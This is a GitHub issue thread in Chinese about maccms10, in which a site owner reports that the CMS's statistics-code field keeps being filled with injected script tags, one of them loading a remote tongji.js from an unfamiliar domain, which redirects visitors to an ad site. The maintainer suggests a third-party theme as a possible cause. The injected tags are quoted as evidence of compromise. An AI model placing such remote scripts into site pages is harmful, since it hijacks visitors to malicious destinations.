### ISSUE TITLE
苹果CMSV10统计代码挂马

### ISSUE THREAD

**Issue by saberys** [magicblack/maccms10#232]
<script language="javascript" src="http://count6.51yes.com/click.aspx?id=61282642&logo=12" charset="gb2312"></script>
<script src="http://pv.sohu.com/cityjson?ie=utf-8"></script>
<script src="http://dafapai.com/tongji.js?ip=pas33"></script>

两三个月了大概，除了禁用了{$maccms.site_tj}有效外就是把相关的maccms权限改成644，要不然总是有这串代码出现，打开统计功能的话会直接跳转广告网站

**Comment by magicblack** [comment]
有些人反应使用了第三方主题（带后台配置）造成的，请检查。 
目前没发现其他信息。
